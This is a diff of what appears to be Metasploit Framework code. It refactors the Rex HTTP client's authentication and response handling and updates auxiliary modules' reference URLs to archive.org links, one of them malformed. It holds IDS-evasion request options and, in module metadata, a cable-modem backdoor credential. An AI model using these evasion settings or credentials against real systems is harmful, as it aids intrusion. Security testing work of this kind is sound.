+          # Take ClientRequest's defaults, but override with our own
+          self.config = Http::ClientRequest::DefaultConfig.merge({
+            'read_max_data' => (1024 * 1024 * 1),
+            'vhost' => hostname,
+            'ssl_server_name_indication' => hostname
+          })
+          config['agent'] ||= Rex::UserAgent.session_agent
+
+          # XXX: This info should all be controlled by ClientRequest
+          self.config_types = {
+            'uri_encode_mode' => ['hex-normal', 'hex-all', 'hex-random', 'hex-noslashes', 'u-normal', 'u-random', 'u-all'],
+            'uri_encode_count' => 'integer',
+            'uri_full_url' => 'bool',
+            'pad_method_uri_count' => 'integer',
+            'pad_uri_version_count' => 'integer',
+            'pad_method_uri_type' => ['space', 'tab', 'apache'],
+            'pad_uri_version_type' => ['space', 'tab', 'apache'],
+            'method_random_valid' => 'bool',
+            'method_random_invalid' => 'bool',
+            'method_random_case' => 'bool',
+            'version_random_valid' => 'bool',
+            'version_random_invalid' => 'bool',
+            'uri_dir_self_reference' => 'bool',
+            'uri_dir_fake_relative' => 'bool',
+            'uri_use_backslashes' => 'bool',
+            'pad_fake_headers' => 'bool',
+            'pad_fake_headers_count' => 'integer',
+            'pad_get_params' => 'bool',
+            'pad_get_params_count' => 'integer',
+            'pad_post_params' => 'bool',
+            'pad_post_params_count' => 'integer',
+            'shuffle_get_params' => 'bool',
+            'shuffle_post_params' => 'bool',
+            'uri_fake_end' => 'bool',
+            'uri_fake_params_start' => 'bool',
+            'header_folding' => 'bool',
+            'chunked_size' => 'integer',
+            'partial' => 'bool'
+          }
        end

-        # This is a dirty hack for broken HTTP servers
-        if rv == Packet::ParseCode::Completed
-          rbody = resp.body
-          rbufq = resp.bufq
+        #
+        # Set configuration options
+        #
+        def set_config(opts = {})
+          opts.each_pair do |var, val|
+            # Default type is string
+            typ = config_types[var] || 'string'

-          rblob = rbody.to_s + rbufq.to_s
-          tries = 0
-          begin
-            # XXX: This doesn't deal with chunked encoding
-            while tries < 1000 and resp.headers["Content-Type"] and resp.headers["Content-Type"].start_with?('text/html') and rblob !~ /<\/html>/i
-              buff = conn.get_once(-1, 0.05)
-              break if not buff
-              rblob += buff
-              tries += 1
+            # These are enum types
+            if typ.is_a?(Array) && !typ.include?(val)
+              raise "The specified value for #{var} is not one of the valid choices"
+            end
+
+            # The caller should have converted these to proper ruby types, but
+            # take care of the case where they didn't before setting the
+            # config.
+
+            if (typ == 'bool')
+              val = val == true || val.to_s =~ /^(t|y|1)/i
+            end
+
+            if (typ == 'integer')
+              val = val.to_i
+            end
+
+            config[var] = val
+          end
+        end
+
+        #
+        # Create an arbitrary HTTP request
+        #
+        # @param opts [Hash]
+        # @option opts 'agent'         [String] User-Agent header value
+        # @option opts 'connection'    [String] Connection header value
+        # @option opts 'cookie'        [String] Cookie header value
+        # @option opts 'data'          [String] HTTP data (only useful with some methods, see rfc2616)
+        # @option opts 'encode'        [Bool]   URI encode the supplied URI, default: false
+        # @option opts 'headers'       [Hash]   HTTP headers, e.g. <code>{ "X-MyHeader" => "value" }</code>
+        # @option opts 'method'        [String] HTTP method to use in the request, not limited to standard methods defined by rfc2616, default: GET
+        # @option opts 'proto'         [String] protocol, default: HTTP
+        # @option opts 'query'         [String] raw query string
+        # @option opts 'raw_headers'   [String] Raw HTTP headers
+        # @option opts 'uri'           [String] the URI to request
+        # @option opts 'version'       [String] version of the protocol, default: 1.1
+        # @option opts 'vhost'         [String] Host header value
+        #
+        # @return [ClientRequest]
+        def request_raw(opts = {})
+          opts = config.merge(opts)
+
+          opts['cgi'] = false
+          opts['port'] = port
+          opts['ssl'] = ssl
+
+          ClientRequest.new(opts)
+        end
+
+        #
+        # Create a CGI compatible request
+        #
+        # @param (see #request_raw)
+        # @option opts (see #request_raw)
+        # @option opts 'ctype'         [String] Content-Type header value, default for POST requests: +application/x-www-form-urlencoded+
+        # @option opts 'encode_params' [Bool]   URI encode the GET or POST variables (names and values), default: true
+        # @option opts 'vars_get'      [Hash]   GET variables as a hash to be translated into a query string
+        # @option opts 'vars_post'     [Hash]   POST variables as a hash to be translated into POST data
+        # @option opts 'vars_form_data'     [Hash]   POST form_data variables as a hash to be translated into multi-part POST form data
+        #
+        # @return [ClientRequest]
+        def request_cgi(opts = {})
+          opts = config.merge(opts)
+
+          opts['cgi'] = true
+          opts['port'] = port
+          opts['ssl'] = ssl
+
+          ClientRequest.new(opts)
+        end
+
+        #
+        # Connects to the remote server if possible.
+        #
+        # @param t [Integer] Timeout
+        # @see Rex::Socket::Tcp.create
+        # @return [Rex::Socket::Tcp]
+        def connect(t = -1)
+          # If we already have a connection and we aren't pipelining, close it.
+          if conn
+            if !pipelining?
+              close
+            else
+              return conn
            end
-          rescue ::Errno::EPIPE, ::EOFError, ::IOError
          end

-          resp.bufq = ""
-          resp.body = rblob
+          timeout = (t.nil? or t == -1) ? 0 : t
+
+          self.conn = Rex::Socket::Tcp.create(
+            'PeerHost' => hostname,
+            'PeerHostname' => config['ssl_server_name_indication'] || config['vhost'],
+            'PeerPort' => port.to_i,
+            'LocalHost' => local_host,
+            'LocalPort' => local_port,
+            'Context' => context,
+            'SSL' => ssl,
+            'SSLVersion' => ssl_version,
+            'Proxies' => proxies,
+            'Timeout' => timeout,
+            'Comm' => comm
+          )
        end
+
+        #
+        # Closes the connection to the remote server.
+        #
+        def close
+          if conn && !conn.closed?
+            conn.shutdown
+            conn.close
+          end
+
+          self.conn = nil
+          self.ntlm_client = nil
+        end
+
+        #
+        # Sends a request and gets a response back
+        #
+        # If the request is a 401, and we have creds, it will attempt to complete
+        # authentication and return the final response
+        #
+        # @return (see #_send_recv)
+        def send_recv(req, t = -1, persist = false)
+          res = _send_recv(req, t, persist)
+          if res and res.code == 401 and res.headers['WWW-Authenticate']
+            res = send_auth(res, req.opts, t, persist)
+          end
+          res
+        end
+
+        #
+        # Transmit an HTTP request and receive the response
+        #
+        # If persist is set, then the request will attempt to reuse an existing
+        # connection.
+        #
+        # Call this directly instead of {#send_recv} if you don't want automatic
+        # authentication handling.
+        #
+        # @return (see #read_response)
+        def _send_recv(req, t = -1, persist = false)
+          @pipeline = persist
+          subscriber.on_request(req)
+          if req.respond_to?(:opts) && req.opts['ntlm_transform_request'] && ntlm_client
+            req = req.opts['ntlm_transform_request'].call(ntlm_client, req)
+          elsif req.respond_to?(:opts) && req.opts['krb_transform_request'] && krb_encryptor
+            req = req.opts['krb_transform_request'].call(krb_encryptor, req)
+          end
+
+          send_request(req, t)
+
+          res = read_response(t, original_request: req)
+          if req.respond_to?(:opts) && req.opts['ntlm_transform_response'] && ntlm_client
+            req.opts['ntlm_transform_response'].call(ntlm_client, res)
+          elsif req.respond_to?(:opts) && req.opts['krb_transform_response'] && krb_encryptor
+            req = req.opts['krb_transform_response'].call(krb_encryptor, res)
+          end
+          res.request = req.to_s if res
+          res.peerinfo = peerinfo if res
+          subscriber.on_response(res)
+          res
+        end
+
+        #
+        # Send an HTTP request to the server
+        #
+        # @param req [Request,ClientRequest,#to_s] The request to send
+        # @param t (see #connect)
+        #
+        # @return [void]
+        def send_request(req, t = -1)
+          connect(t)
+          conn.put(req.to_s)
+        end
+
+        # Resends an HTTP Request with the proper authentication headers
+        # set. If we do not support the authentication type the server requires
+        # we return the original response object
+        #
+        # @param res [Response] the HTTP Response object
+        # @param opts [Hash] the options used to generate the original HTTP request
+        # @param t [Integer] the timeout for the request in seconds
+        # @param persist [Boolean] whether or not to persist the TCP connection (pipelining)
+        #
+        # @return [Response] the last valid HTTP response object we received
+        def send_auth(res, opts, t, persist)
+          if opts['username'].nil? or opts['username'] == ''
+            if username and !(username == '')
+              opts['username'] = username
+              opts['password'] = password
+            else
+              opts['username'] = nil
+              opts['password'] = nil
+            end
+          end
+
+          if opts[:kerberos_authenticator].nil?
+            opts[:kerberos_authenticator] = kerberos_authenticator
+          end
+
+          return res if (opts['username'].nil? or opts['username'] == '') and opts[:kerberos_authenticator].nil?
+
+          supported_auths = res.headers['WWW-Authenticate']
+
+          # if several providers are available, the client may want one in particular
+          preferred_auth = opts['preferred_auth']
+
+          if supported_auths.include?('Basic') && (preferred_auth.nil? || preferred_auth == 'Basic')
+            opts['headers'] ||= {}
+            opts['headers']['Authorization'] = basic_auth_header(opts['username'], opts['password'])
+            req = request_cgi(opts)
+            res = _send_recv(req, t, persist)
+            return res
+          elsif supported_auths.include?('Digest') && (preferred_auth.nil? || preferred_auth == 'Digest')
+            temp_response = digest_auth(opts)
+            if temp_response.is_a? Rex::Proto::Http::Response
+              res = temp_response
+            end
+            return res
+          elsif supported_auths.include?('NTLM') && (preferred_auth.nil? || preferred_auth == 'NTLM')
+            opts['provider'] = 'NTLM'
+            temp_response = negotiate_auth(opts)
+            if temp_response.is_a? Rex::Proto::Http::Response
+              res = temp_response
+            end
+            return res
+          elsif supported_auths.include?('Negotiate') && (preferred_auth.nil? || preferred_auth == 'Negotiate')
+            opts['provider'] = 'Negotiate'
+            temp_response = negotiate_auth(opts)
+            if temp_response.is_a? Rex::Proto::Http::Response
+              res = temp_response
+            end
+            return res
+          elsif supported_auths.include?('Negotiate') && (preferred_auth.nil? || preferred_auth == 'Kerberos')
+            opts['provider'] = 'Negotiate'
+            temp_response = kerberos_auth(opts)
+            if temp_response.is_a? Rex::Proto::Http::Response
+              res = temp_response
+            end
+            return res
+          end
+          return res
+        end
+
+        # Converts username and password into the HTTP Basic authorization
+        # string.
+        #
+        # @return [String] A value suitable for use as an Authorization header
+        def basic_auth_header(username, password)
+          auth_str = username.to_s + ':' + password.to_s
+          'Basic ' + Rex::Text.encode_base64(auth_str)
+        end
+        # Send a series of requests to complete Digest Authentication
+        #
+        # @param opts [Hash] the options used to build an HTTP request
+        # @return [Response] the last valid HTTP response we received
+        def digest_auth(opts = {})
+          to = opts['timeout'] || 20
+
+          digest_user = opts['username'] || ''
+          digest_password = opts['password'] || ''
+
+          method = opts['method']
+          path = opts['uri']
+          iis = true
+          if (opts['DigestAuthIIS'] == false or config['DigestAuthIIS'] == false)
+            iis = false
+          end
+
+          begin
+            resp = opts['response']
+
+            if !resp
+              # Get authentication-challenge from server, and read out parameters required
+              r = request_cgi(opts.merge({
+                'uri' => path,
+                'method' => method
+              }))
+              resp = _send_recv(r, to)
+              unless resp.is_a? Rex::Proto::Http::Response
+                return nil
+              end
+
+              if resp.code != 401
+                return resp
+              end
+              return resp unless resp.headers['WWW-Authenticate']
+            end
+
+            # Don't anchor this regex to the beginning of string because header
+            # folding makes it appear later when the server presents multiple
+            # WWW-Authentication options (such as is the case with IIS configured
+            # for Digest or NTLM).
+            resp['www-authenticate'] =~ /Digest (.*)/
+
+            parameters = {}
+            ::Regexp.last_match(1).split(/,[[:space:]]*/).each do |p|
+              k, v = p.split('=', 2)
+              parameters[k] = v.gsub('"', '')
+            end
+
+            auth_digest = Rex::Proto::Http::AuthDigest.new
+            auth = auth_digest.digest(digest_user, digest_password, method, path, parameters, iis)
+
+            headers = { 'Authorization' => auth.join(', ') }
+            headers.merge!(opts['headers']) if opts['headers']
+
+            # Send main request with authentication
+            r = request_cgi(opts.merge({
+              'uri' => path,
+              'method' => method,
+              'headers' => headers
+            }))
+            resp = _send_recv(r, to, true)
+            unless resp.is_a? Rex::Proto::Http::Response
+              return nil
+            end
+
+            return resp
+          rescue ::Errno::EPIPE, ::Timeout::Error
+          end
+        end
+
+        def kerberos_auth(opts = {})
+          to = opts['timeout'] || 20
+          auth_result = kerberos_authenticator.authenticate(mechanism: Rex::Proto::Gss::Mechanism::KERBEROS)
+          gss_data = auth_result[:security_blob]
+          gss_data_b64 = Rex::Text.encode_base64(gss_data)
+
+          # Separate options for the auth requests
+          auth_opts = opts.clone
+          auth_opts['headers'] = opts['headers'].clone
+          auth_opts['headers']['Authorization'] = "Kerberos #{gss_data_b64}"
+
+          if auth_opts['no_body_for_auth']
+            auth_opts.delete('data')
+            auth_opts.delete('krb_transform_request')
+            auth_opts.delete('krb_transform_response')
+          end
+
+          begin
+            # Send the auth request
+            r = request_cgi(auth_opts)
+            resp = _send_recv(r, to)
+            unless resp.is_a? Rex::Proto::Http::Response
+              return nil
+            end
+
+            # Get the challenge and craft the response
+            response = resp.headers['WWW-Authenticate'].scan(/Kerberos ([A-Z0-9\x2b\x2f=]+)/ni).flatten[0]
+            return resp unless response
+
+            decoded = Rex::Text.decode_base64(response)
+            mutual_auth_result = kerberos_authenticator.parse_gss_init_response(decoded, auth_result[:session_key])
+            self.krb_encryptor = kerberos_authenticator.get_message_encryptor(mutual_auth_result[:ap_rep_subkey],
+                                                                              auth_result[:client_sequence_number],
+                                                                              mutual_auth_result[:server_sequence_number])
+
+            if opts['no_body_for_auth']
+              # If the body wasn't sent in the authentication, now do the actual request
+              r = request_cgi(opts)
+              resp = _send_recv(r, to, true)
+            end
+            return resp
+          rescue ::Errno::EPIPE, ::Timeout::Error
+            return nil
+          end
+        end
+
+        #
+        # Builds a series of requests to complete Negotiate Auth. Works essentially
+        # the same way as Digest auth. Same pipelining concerns exist.
+        #
+        # @option opts (see #send_request_cgi)
+        # @option opts provider ["Negotiate","NTLM"] What Negotiate provider to use
+        #
+        # @return [Response] the last valid HTTP response we received
+        def negotiate_auth(opts = {})
+          to = opts['timeout'] || 20
+          opts['username'] ||= ''
+          opts['password'] ||= ''
+
+          if opts['provider'] and opts['provider'].include? 'Negotiate'
+            provider = 'Negotiate '
+          else
+            provider = 'NTLM '
+          end
+
+          opts['method'] ||= 'GET'
+          opts['headers'] ||= {}
+
+          workstation_name = Rex::Text.rand_text_alpha(rand(6..13))
+          domain_name = config['domain']
+
+          ntlm_client = ::Net::NTLM::Client.new(
+            opts['username'],
+            opts['password'],
+            workstation: workstation_name,
+            domain: domain_name
+          )
+          type1 = ntlm_client.init_context
+
+          begin
+            # Separate options for the auth requests
+            auth_opts = opts.clone
+            auth_opts['headers'] = opts['headers'].clone
+            auth_opts['headers']['Authorization'] = provider + type1.encode64
+
+            if auth_opts['no_body_for_auth']
+              auth_opts.delete('data')
+              auth_opts.delete('ntlm_transform_request')
+              auth_opts.delete('ntlm_transform_response')
+            end
+
+            # First request to get the challenge
+            r = request_cgi(auth_opts)
+            resp = _send_recv(r, to)
+            unless resp.is_a? Rex::Proto::Http::Response
+              return nil
+            end
+
+            return resp unless resp.code == 401 && resp.headers['WWW-Authenticate']
+
+            # Get the challenge and craft the response
+            ntlm_challenge = resp.headers['WWW-Authenticate'].scan(/#{provider}([A-Z0-9\x2b\x2f=]+)/ni).flatten[0]
+            return resp unless ntlm_challenge
+
+            ntlm_message_3 = ntlm_client.init_context(ntlm_challenge, channel_binding)
+
+            self.ntlm_client = ntlm_client
+            # Send the response
+            auth_opts['headers']['Authorization'] = "#{provider}#{ntlm_message_3.encode64}"
+            r = request_cgi(auth_opts)
+            resp = _send_recv(r, to, true)
+
+            unless resp.is_a? Rex::Proto::Http::Response
+              return nil
+            end
+
+            if opts['no_body_for_auth']
+              # If the body wasn't sent in the authentication, now do the actual request
+              r = request_cgi(opts)
+              resp = _send_recv(r, to, true)
+            end
+            return resp
+          rescue ::Errno::EPIPE, ::Timeout::Error
+            return nil
+          end
+        end
+
+        def channel_binding
+          if !conn.respond_to?(:peer_cert) or conn.peer_cert.nil?
+            nil
+          else
+            Net::NTLM::ChannelBinding.create(OpenSSL::X509::Certificate.new(conn.peer_cert))
+          end
+        end
+
+        # Read a response from the server
+        #
+        # Wait at most t seconds for the full response to be read in.
+        # If t is specified as a negative value, it indicates an indefinite wait cycle.
+        # If t is specified as nil or 0, it indicates no response parsing is required.
+        #
+        # @return [Response]
+        def read_response(t = -1, opts = {})
+          # Return a nil response if timeout is nil or 0
+          return if t.nil? || t == 0
+
+          resp = Response.new
+          resp.max_data = config['read_max_data']
+
+          original_request = opts.fetch(:original_request) { nil }
+          parse_opts = {}
+          unless original_request.nil?
+            parse_opts = { orig_method: original_request.opts['method'] }
+          end
+
+          Timeout.timeout((t < 0) ? nil : t) do
+            rv = nil
+            while (
+                     !conn.closed? and
+                     rv != Packet::ParseCode::Completed and
+                     rv != Packet::ParseCode::Error
+                   )
+
+              begin
+                buff = conn.get_once(resp.max_data, 1)
+                rv = resp.parse(buff || '', parse_opts)
+
+              # Handle unexpected disconnects
+              rescue ::Errno::EPIPE, ::EOFError, ::IOError
+                case resp.state
+                when Packet::ParseState::ProcessingHeader
+                  resp = nil
+                when Packet::ParseState::ProcessingBody
+                  # truncated request, good enough
+                  resp.error = :truncated
+                end
+                break
+              end
+
+              # This is a dirty hack for broken HTTP servers
+              next unless rv == Packet::ParseCode::Completed
+
+              rbody = resp.body
+              rbufq = resp.bufq
+
+              rblob = rbody.to_s + rbufq.to_s
+              tries = 0
+              begin
+                # XXX: This doesn't deal with chunked encoding
+                while tries < 1000 and resp.headers['Content-Type'] and resp.headers['Content-Type'].start_with?('text/html') and rblob !~ %r{</html>}i
+                  buff = conn.get_once(-1, 0.05)
+                  break if !buff
+
+                  rblob += buff
+                  tries += 1
+                end
+              rescue ::Errno::EPIPE, ::EOFError, ::IOError
+              end
+
+              resp.bufq = ''
+              resp.body = rblob
+            end
+          end
+
+          return resp if !resp
+
+          # As a last minute hack, we check to see if we're dealing with a 100 Continue here.
+          # Most of the time this is handled by the parser via check_100()
+          if resp.proto == '1.1' and resp.code == 100 and !(opts[:skip_100])
+            # Read the real response from the body if we found one
+            # If so, our real response became the body, so we re-parse it.
+            if resp.body.to_s =~ /^HTTP/
+              body = resp.body
+              resp = Response.new
+              resp.max_data = config['read_max_data']
+              resp.parse(body, parse_opts)
+            # We found a 100 Continue but didn't read the real reply yet
+            # Otherwise reread the reply, but don't try this hack again
+            else
+              resp = read_response(t, skip_100: true)
+            end
+          end
+
+          resp
+        rescue Timeout::Error
+          # Allow partial response due to timeout
+          resp if config['partial']
+        end
+
+        #
+        # Cleans up any outstanding connections and other resources.
+        #
+        def stop
+          close
+        end
+
+        #
+        # Returns whether or not the conn is valid.
+        #
+        def conn?
+          conn != nil
+        end
+
+        #
+        # Whether or not connections should be pipelined.
+        #
+        def pipelining?
+          pipeline
+        end
+
+        #
+        # Target host addr and port for this connection
+        #
+        def peerinfo
+          if conn
+            pi = conn.peerinfo || nil
+            if pi
+              return {
+                'addr' => pi.split(':')[0],
+                'port' => pi.split(':')[1].to_i
+              }
+            end
+          end
+          nil
+        end
+
+        #
+        # An optional comm to use for creating the underlying socket.
+        #
+        attr_accessor :comm
+        #
+        # The client request configuration
+        #
+        attr_accessor :config
+        #
+        # The client request configuration classes
+        #
+        attr_accessor :config_types
+        #
+        # Whether or not pipelining is in use.
+        #
+        attr_accessor :pipeline
+        #
+        # The local host of the client.
+        #
+        attr_accessor :local_host
+        #
+        # The local port of the client.
+        #
+        attr_accessor :local_port
+        #
+        # The underlying connection.
+        #
+        attr_accessor :conn
+        #
+        # The calling context to pass to the socket
+        #
+        attr_accessor :context
+        #
+        # The proxy list
+        #
+        attr_accessor :proxies
+
+        # Auth
+        attr_accessor :username, :password, :kerberos_authenticator
+
+        # When parsing the request, thunk off the first response from the server, since junk
+        attr_accessor :junk_pipeline
+
+        # @return [Rex::Proto::Http::HttpSubscriber] The HTTP subscriber
+        attr_accessor :subscriber
+
+        protected
+
+        # https
+        attr_accessor :ssl, :ssl_version # :nodoc:
+
+        attr_accessor :hostname, :port # :nodoc:
+
+        #
+        # The established NTLM connection info
+        #
+        attr_accessor :ntlm_client
+
+        #
+        # The established kerberos connection info
+        #
+        attr_accessor :krb_encryptor
      end
    end
-
-    return resp if not resp
-
-    # As a last minute hack, we check to see if we're dealing with a 100 Continue here.
-    # Most of the time this is handled by the parser via check_100()
-    if resp.proto == '1.1' and resp.code == 100 and not opts[:skip_100]
-      # Read the real response from the body if we found one
-      # If so, our real response became the body, so we re-parse it.
-      if resp.body.to_s =~ /^HTTP/
-        body = resp.body
-        resp = Response.new
-        resp.max_data = config['read_max_data']
-        rv = resp.parse(body, parse_opts)
-      # We found a 100 Continue but didn't read the real reply yet
-      # Otherwise reread the reply, but don't try this hack again
-      else
-        resp = read_response(t, :skip_100 => true)
-      end
-    end
-
-    resp
-  rescue Timeout::Error
-    # Allow partial response due to timeout
-    resp if config['partial']
  end
-
-  #
-  # Cleans up any outstanding connections and other resources.
-  #
-  def stop
-    close
-  end
-
-  #
-  # Returns whether or not the conn is valid.
-  #
-  def conn?
-    conn != nil
-  end
-
-  #
-  # Whether or not connections should be pipelined.
-  #
-  def pipelining?
-    pipeline
-  end
-
-  #
-  # Target host addr and port for this connection
-  #
-  def peerinfo
-    if self.conn
-      pi = self.conn.peerinfo || nil
-      if pi
-        return {
-          'addr' => pi.split(':')[0],
-          'port' => pi.split(':')[1].to_i
-        }
-      end
-    end
-    nil
-  end
-  
-  #
-  # An optional comm to use for creating the underlying socket.
-  #
-  attr_accessor :comm
-  #
-  # The client request configuration
-  #
-  attr_accessor :config
-  #
-  # The client request configuration classes
-  #
-  attr_accessor :config_types
-  #
-  # Whether or not pipelining is in use.
-  #
-  attr_accessor :pipeline
-  #
-  # The local host of the client.
-  #
-  attr_accessor :local_host
-  #
-  # The local port of the client.
-  #
-  attr_accessor :local_port
-  #
-  # The underlying connection.
-  #
-  attr_accessor :conn
-  #
-  # The calling context to pass to the socket
-  #
-  attr_accessor :context
-  #
-  # The proxy list
-  #
-  attr_accessor :proxies
-
-  # Auth
-  attr_accessor :username, :password, :kerberos_authenticator
-
-  # When parsing the request, thunk off the first response from the server, since junk
-  attr_accessor :junk_pipeline
-
-  # @return [Rex::Proto::Http::HttpSubscriber] The HTTP subscriber
-  attr_accessor :subscriber
-
-protected
-
-  # https
-  attr_accessor :ssl, :ssl_version # :nodoc:
-
-  attr_accessor :hostname, :port # :nodoc:
-
-  #
-  # The established NTLM connection info
-  #
-  attr_accessor :ntlm_client
-
-  #
-  # The established kerberos connection info
-  #
-  attr_accessor :krb_encryptor
-end
-
-end
-end
 end
@@ -116,6 +116,16 @@ class Response < Packet
    Nokogiri::XML(self.body)
  end

+  def gzip_decode!
+    self.body = gzip_decode
+  end
+
+  def gzip_decode
+    gz = Zlib::GzipReader.new(StringIO.new(self.body.to_s))    
+
+    gz.read
+  end
+
  # Returns a parsed json document.
  # Instead of using regexes to parse the JSON body, you should use this.
  #
@@ -288,7 +288,15 @@ class SimpleClient
  end

  def peerinfo
-    "#{peerhost}:#{peerport}"
+    Rex::Socket.to_authority(peerhost, peerport)
+  end
+
+  def signing_required
+    if client.is_a?(Rex::Proto::SMB::Client)
+      client.peer_require_signing
+    else
+      client.signing_required
+    end
  end

  private
@@ -129,7 +129,7 @@ Gem::Specification.new do |spec|
  # Needed for some modules (polkit_auth_bypass.rb)
  spec.add_runtime_dependency 'unix-crypt'
  # Needed for Kerberos structure parsing; Pinned to ensure a security review is performed on updates
-  spec.add_runtime_dependency 'rasn1', '0.13.0'
+  spec.add_runtime_dependency 'rasn1', '0.14.0'

  #
  # File Parsing Libraries
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary
      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
      'PassiveActions' => [ 'WebServer' ],
      'References' => [
-        [ 'URL', 'https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/'],
+        [ 'URL', 'http://web.archive.org/web/20230321034739/https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/'],
        [ 'URL', 'https://web.archive.org/web/20150316151817/http://1337day.com/exploit/description/22581' ],
        [ 'OSVDB', '110664' ],
        [ 'CVE', '2014-6041' ]
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary
      },
      'Author' => ['wvu'],
      'References' => [
-        ['URL', 'https://www.amazon.com/dp/B00CX5P8FC?_encoding=UTF8&showFS=1'],
+        ['URL', 'http://http://web.archive.org/web/20210301101536/http://www.amazon.com/dp/B00CX5P8FC/?_encoding=UTF8'],
        ['URL', 'https://www.amazon.com/dp/B00GDQ0RMG/ref=fs_ftvs']
      ],
      'License' => MSF_LICENSE,
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary
          [ 'CVE', '2015-0964' ], # XSS vulnerability
          [ 'CVE', '2015-0965' ], # CSRF vulnerability
          [ 'CVE', '2015-0966' ], # "technician/yZgO8Bvj" web interface backdoor
-          [ 'URL', 'https://www.rapid7.com/blog/post/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems/' ],
+          [ 'URL', 'http://web.archive.org/web/20220810083803/https://www.rapid7.com/blog/post/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems/' ],
        ]
      )
    )
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Auxiliary
          ['CVE', '2023-20198'],
          # Vendor advisories.
          ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'],
-          ['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'],
+          ['URL', 'http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'],
          # Vendor list of (205) vulnerable versions.
          ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'],
          # Technical details on CVE-2023-20198.
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Auxiliary
          ['CVE', '2023-20273'],
          # Vendor advisories.
          ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'],
-          ['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'],
+          ['URL', 'http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'],
          # Vendor list of (205) vulnerable versions.
          ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'],
          # Technical details on CVE-2023-20198.
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
        'References' => [
          [ 'CVE', '2013-0136' ],
          [ 'US-CERT-VU', '701572' ],
-          [ 'URL', 'https://www.rapid7.com/blog/post/2013/05/15/new-1day-exploits-mutiny-vulnerabilities/' ]
+          [ 'URL', 'http://web.archive.org/web/20250114041839/https://www.rapid7.com/blog/post/2013/05/15/new-1day-exploits-mutiny-vulnerabilities/' ]
        ],
        'Actions' => [
          ['Read', { 'Description' => 'Read arbitrary file' }],
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
        ],
        'License' => MSF_LICENSE,
        'References' => [
-          [ 'URL', 'https://www.rapid7.com/blog/post/2013/08/16/r7-vuln-2013-07-24/' ]
+          [ 'URL', 'http://web.archive.org/web/20230402081629/https://www.rapid7.com/blog/post/2013/08/16/r7-vuln-2013-07-24/' ]
        ],
        'DefaultOptions' => {
          'SSL' => true
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary
        'References' => [
          [ 'CVE', '2012-2626' ],
          [ 'OSVDB', '84318' ],
-          [ 'URL', 'https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt' ]
+          [ 'URL', 'http://web.archive.org/web/20130827051639/https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt' ]
        ],
        'Author' => [
          'MC',
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Auxiliary
        'References' => [
          ['CVE', '2020-1938'],
          ['EDB', '48143'],
-          ['URL', 'https://www.chaitin.cn/en/ghostcat']
+          ['URL', 'http://web.archive.org/web/20250114042903/https://www.chaitin.cn/en/ghostcat']
        ],
        'DisclosureDate' => '2020-02-20',
        'Notes' => {
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary
      'References' => [
        ['CVE', '2010-3714'],
        ['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020'],
-        ['URL', 'http://gregorkopf.de/slides_berlinsides_2010.pdf'],
+        ['URL', 'http://web.archive.org/web/20180126053019/http://gregorkopf.de/slides_berlinsides_2010.pdf'],
      ],
      'Author' => [
        'Chris John Riley',
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
          ['OSVDB', '114751'],
          ['URL', 'http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx'],
          ['URL', 'https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/'],
-          ['URL', 'https://github.com/bidord/pykek'],
+          ['URL', 'http://web.archive.org/web/20180107213459/https://github.com/bidord/pykek'],
          ['URL', 'https://www.rapid7.com/blog/post/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit']
        ],
      'License' => MSF_LICENSE,
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary
      'License'        => MSF_LICENSE,
      'References'     =>
        [
-          [ 'URL', 'https://www.metasploit.com/users/mc' ],
+          [ 'URL', 'http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/' ],
        ],
      'DisclosureDate' => '2007-12-07'))

@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
      'License'        => MSF_LICENSE,
      'References'     =>
        [
-          [ 'URL', 'https://www.metasploit.com/users/mc' ],
+          [ 'URL', 'http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/' ],
        ],
      'DisclosureDate' => '2007-12-07'))

@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary
      'License'        => MSF_LICENSE,
      'References'     =>
        [
